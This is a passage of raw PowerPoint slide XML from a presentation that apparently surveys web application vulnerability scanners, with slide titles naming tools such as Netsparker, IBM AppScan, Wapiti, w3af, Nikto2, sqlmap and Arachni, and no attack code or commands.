          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="397" name="Picture 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6267600" y="0"/>
            <a:ext cx="2876040" cy="103788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Shape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1447920"/>
            <a:ext cx="7772040" cy="4320720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="399"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Netsparker</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="400"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01"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B66AB36C-DAFE-4D2E-91A3-5FE6768A6257}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="402"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03" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1503000"/>
            <a:ext cx="7772040" cy="4821480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="404" name="Picture 3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5972040" y="76320"/>
            <a:ext cx="3171600" cy="87588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57200" y="1447920"/>
            <a:ext cx="7772040" cy="4320720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="406"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IBM AppScan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40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08"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1E674F36-6A99-4F4F-90EF-721EB077ABA9}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="409"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10" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1503000"/>
            <a:ext cx="7772040" cy="4821480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="411" name="Picture 3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7162920" y="47520"/>
            <a:ext cx="1980720" cy="71388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Shape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1447920"/>
            <a:ext cx="7772040" cy="4320720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413"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WebCruiser</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="414"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15"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957D6669-D576-47AE-8E79-41F86B974A5B}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="416"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17" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1484280"/>
            <a:ext cx="7772040" cy="4840200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="418" name="Picture 3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5095800" y="66600"/>
            <a:ext cx="4047840" cy="6188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950400" y="1448280"/>
            <a:ext cx="2120040" cy="1460880"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7A7A7A"/>
          </a:solidFill>
          <a:ln w="28440">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="420" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950400" y="2909160"/>
            <a:ext cx="2120040" cy="786240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="199080" tIns="199080" rIns="199080" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Wapiti</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="421" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3283200" y="1448280"/>
            <a:ext cx="2120040" cy="1460880"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7A7A7A"/>
          </a:solidFill>
          <a:ln w="28440">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="422" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3283200" y="2909160"/>
            <a:ext cx="2120040" cy="786240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="199080" tIns="199080" rIns="199080" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>W3af</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="423" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5616000" y="1448280"/>
            <a:ext cx="2120040" cy="1460880"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7A7A7A"/>
          </a:solidFill>
          <a:ln w="28440">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="424" name="CustomShape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5616000" y="2909160"/>
            <a:ext cx="2120040" cy="786240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="199080" tIns="199080" rIns="199080" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Nikto</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="425" name="CustomShape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2116800" y="3908160"/>
            <a:ext cx="2120040" cy="1460880"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7A7A7A"/>
          </a:solidFill>
          <a:ln w="28440">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="426" name="CustomShape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2116800" y="5369040"/>
            <a:ext cx="2120040" cy="786240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="199080" tIns="199080" rIns="199080" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="427" name="CustomShape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4449600" y="3908160"/>
            <a:ext cx="2120040" cy="1460880"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7A7A7A"/>
          </a:solidFill>
          <a:ln w="28440">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="428" name="CustomShape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4449600" y="5369040"/>
            <a:ext cx="2120040" cy="786240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="199080" tIns="199080" rIns="199080" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Arachni</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="429" name="TextShape 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1447920"/>
            <a:ext cx="7772040" cy="4320720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="430" name="TextShape 1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Open Source Software</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="431" name="TextShape 1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32" name="TextShape 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="8227080" y="5885640"/>
            <a:ext cx="1315440" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="45720" tIns="91440" rIns="45720" bIns="91440" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{2DD6BDAD-91E3-438B-B12B-AD09F3B836FE}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="433" name="TextShape 1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Wapiti Web Apps Scanner</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="435" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="436" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="5105160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="437" name="Picture 3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5972040" y="76320"/>
            <a:ext cx="3171600" cy="87588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w3af Web Apps Scanner</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="439" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="440" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="5194080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="441" name="Picture 3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6477120" y="76320"/>
            <a:ext cx="2666520" cy="89496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457200" y="-76320"/>
            <a:ext cx="5790960" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Nikto2 Web Server Scanner</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="443" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="444" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="5105160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="445" name="Picture 3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5972040" y="76320"/>
            <a:ext cx="3171600" cy="111420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Sqlmap SQL Injection Tool</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="447" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="448" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="5105160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="449" name="Picture 3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6686640" y="76320"/>
            <a:ext cx="2457000" cy="82836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457200" y="-76320"/>
            <a:ext cx="5790960" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Arachni Web Apps Scanner</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="451" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="452" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="5181120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="453" name="Picture 3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6095880" y="152280"/>
            <a:ext cx="3047760" cy="54252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5125680" y="364680"/>
            <a:ext cx="6646680" cy="6646680"/>
          </a:xfrm>
          <a:prstGeom prst="blockArc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 18900000"/>
              <a:gd name="adj2" fmla="val 2700000"/>
              <a:gd name="adj3" fmla="val 325"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28440">
            <a:solidFill>
              <a:srgbClr val="7485B9"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="227" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="853920" y="1479240"/>
            <a:ext cx="7763760" cy="519480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3C5082"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="412560" tIns="71280" rIns="71280" bIns="71280" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT"/>
              </a:rPr>
              <a:t>Blind</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="528840" y="1414080"/>
            <a:ext cx="649440" cy="649440"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="3C5082"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="229" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1281600" y="2259000"/>
            <a:ext cx="7336080" cy="519480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="5A6FAD"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="412560" tIns="71280" rIns="71280" bIns="71280" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
